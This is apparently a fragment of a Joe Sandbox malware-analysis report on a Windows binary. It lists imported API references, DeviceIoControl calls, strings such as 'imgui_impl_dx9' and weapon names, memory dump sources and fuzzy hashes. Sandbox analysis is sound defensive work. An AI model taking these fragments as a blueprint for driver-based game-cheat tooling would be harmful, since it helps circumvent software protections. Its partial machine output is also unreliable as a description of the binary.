                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A24
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A36
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A48
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A5A
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A6C
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3A7E
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3A90
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AA2
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3AB4
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AC6
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AD8
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AEA
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3AFC
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B0E
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B20
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B32
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B44
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B56
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B68
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B7A
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3B8C
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF735DD3B9E
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF735DD3BB0
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3BC2
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3BD4
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3BE6
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3BF8
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF735DD3C0A
                                                                                                                                                                                                              • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF735DD3C1C
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7C30: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF735DE74DA,?,?,?,00007FF735DE7984), ref: 00007FF735DE7C90
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7C30: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF735DE74DA,?,?,?,00007FF735DE7984), ref: 00007FF735DE7CB2
                                                                                                                                                                                                              • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DD3C4A
                                                                                                                                                                                                              • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF735DD3C81
                                                                                                                                                                                                              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF735DD3C8B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@$??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@Init@?$basic_streambuf@fclosememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1635463032-0
                                                                                                                                                                                                              • Opcode ID: 1e5164825a538ee13ca689eab3d7c6edcf74a7573b2029405d4bf4d179095a8e
                                                                                                                                                                                                              • Instruction ID: 55bcbbb0c143ef77d94d7498a10e6f2e01c070f4f08c6daedf25d0b29fb4f281
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e5164825a538ee13ca689eab3d7c6edcf74a7573b2029405d4bf4d179095a8e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6691DA61A3DA4BA2EF44EB14E8945A9B321FF80F4AFC05032E54E46978DF2DDA49D710
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: c5ba173f833f5b9a869d8b74cc6861b0191b3cc17a7c7d1a4161cda319e8907c
                                                                                                                                                                                                              • Instruction ID: 5e465c655c35ac71cefcee9ad9ace6e8bdc16c66ef6da17dae6a030fafd85d9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5ba173f833f5b9a869d8b74cc6861b0191b3cc17a7c7d1a4161cda319e8907c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CB14931A2B683B1FF8AAF51D4906B8A3A0EF45F45F885436C90D877A1DF2DA541B730
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: fclose$fseekmalloc$freadfreeftell
                                                                                                                                                                                                              • String ID: %s, %.0fpx$C:\Windows\Fonts\Impact.ttf
                                                                                                                                                                                                              • API String ID: 3453272378-2114150515
                                                                                                                                                                                                              • Opcode ID: 39950559af9aea2db03513b28cbd6c1e210d312cab9208b347ef7cf209f7ff31
                                                                                                                                                                                                              • Instruction ID: 129b3a0be3fff661770c5ac3e184a593e366df9de7c209511d12e5ac20e6ddbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39950559af9aea2db03513b28cbd6c1e210d312cab9208b347ef7cf209f7ff31
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2691D521918BC6A5F7169F6DE8412F9B3B0FF98B49F446230EE8916724EF39D146CB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: PerformanceQueryexit$CounterCreate9Direct3Frequencymalloc
                                                                                                                                                                                                              • String ID: @$OTTO$imgui_impl_dx9$imgui_impl_win32
                                                                                                                                                                                                              • API String ID: 2444153533-2332507762
                                                                                                                                                                                                              • Opcode ID: 5445eb45c4c382c2b7768161d1c49320f811e22e27bde1671fe4c3e8339ada38
                                                                                                                                                                                                              • Instruction ID: b4145dc81077f10d56c850a6ed8defc301ece198742db4280450379e9b6f9052
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5445eb45c4c382c2b7768161d1c49320f811e22e27bde1671fe4c3e8339ada38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8D15B72A49B82A6E311AF25E9443A9B7B4FF44B48F804135DB8C0B764DF7EE164DB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memchr$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID: Rifl$Shotgun$Snip
                                                                                                                                                                                                              • API String ID: 876120417-932107277
                                                                                                                                                                                                              • Opcode ID: 0639a9f2ec585014b3873c095b304635025d16159d33fafefcbad199ef3611de
                                                                                                                                                                                                              • Instruction ID: 279e422c30c2dff818fb773acf6e1a5669691db5d41f25794752e33e23a70d62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0639a9f2ec585014b3873c095b304635025d16159d33fafefcbad199ef3611de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9551C623A28643A5FA14AF21D4802B9A7E0EF44FA4FD44231DA6D03BD5DF7CE545BB20
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE8040: DeviceIoControl.KERNEL32 ref: 00007FF735DE80F9
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF735DD2963
                                                                                                                                                                                                                • Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD28B1
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2ACC
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2B0D
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2B5E
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2B9E
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2BFA
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2C77
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD2CC3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ControlDevicememmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4207174869-0
                                                                                                                                                                                                              • Opcode ID: a206f17d0baf4eeb31e64d865681b70d3b03a713257a3b94ac86b94143e747e1
                                                                                                                                                                                                              • Instruction ID: f69a3267301b6d3e7f98e53c22c569d875678637094d26acc38a6e36782a7218
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a206f17d0baf4eeb31e64d865681b70d3b03a713257a3b94ac86b94143e747e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DE1E263F24A47A5FB04EB68D4803AD67A1EF45BA4F805231EA6C17BD9DF78D480E350
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: freemalloc$memmove
                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                              • API String ID: 3069178222-1684325040
                                                                                                                                                                                                              • Opcode ID: 2163ba520d9052c8bba6a218e0553cb800c4eb239031deab9f51477c17a23248
                                                                                                                                                                                                              • Instruction ID: aee471fca2bd838c4256d7f5b5e41ba220a7af6d88b935fb4204ed7ac33d1d58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2163ba520d9052c8bba6a218e0553cb800c4eb239031deab9f51477c17a23248
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C71BD32A19B82A6EB59DF25D590278B3A4FB48F44F889239CF8D47351EF38E491D310
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: fclose$fseek$freadfreeftellmalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3246642831-0
                                                                                                                                                                                                              • Opcode ID: c037d8738ead99cedb1b90ae9736a27c5b295fbf60cae6eeaefc6a729d5c03a7
                                                                                                                                                                                                              • Instruction ID: 2a1c2159f58717a34f780db23ac0fb832a13b7a7be007662a2ca478f8ff935a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c037d8738ead99cedb1b90ae9736a27c5b295fbf60cae6eeaefc6a729d5c03a7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB318121B29B43A1FB59BB17A88437AA2A0EF48F80FCC1034DD4E07794DE3CE5526320
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: cd776186ab4a2a557464b29084a31b67cb617ff56af99281e7ece6197f8cbfa9
                                                                                                                                                                                                              • Instruction ID: 5d9331d1352085faebad4de95a63e30ecd7af91a4df95f246763c1f773c03e8b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd776186ab4a2a557464b29084a31b67cb617ff56af99281e7ece6197f8cbfa9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F512332A1AB82A6FB55EF21E490228B3A5FF44F44F985935CE8D07754DF38E491E720
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memchr$freemallocmemmove
                                                                                                                                                                                                              • String ID: Window$]
                                                                                                                                                                                                              • API String ID: 3276875001-2892678728
                                                                                                                                                                                                              • Opcode ID: 700d930322d9ce77485cca36474c8dec97cefded9ecda2720f0ca6fa38871625
                                                                                                                                                                                                              • Instruction ID: 2af46a9e547f23442fdde934e9618fe7eb67e9392465debd99e90a1c3381cc49
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 700d930322d9ce77485cca36474c8dec97cefded9ecda2720f0ca6fa38871625
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D512422B2C687B0EB21AB16959437AE7D3AB55FC0FC84131DE4D07B88DE2CE542D361
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2016347663-0
                                                                                                                                                                                                              • Opcode ID: be9118b635c93c1d2169e4cff8661e2d38d0c490d4f23082b791273f7c39df30
                                                                                                                                                                                                              • Instruction ID: c6bde7ce52090e4db789597c4e0473efc006ef7f199a7a5c4181d8d244562e20
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be9118b635c93c1d2169e4cff8661e2d38d0c490d4f23082b791273f7c39df30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A51D232A19B82A2EA18AF21D5842AD6360FB14FC4F944632DF6D07791DF78E1E5E350
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,00007FF735DD4B87), ref: 00007FF735DE8A23
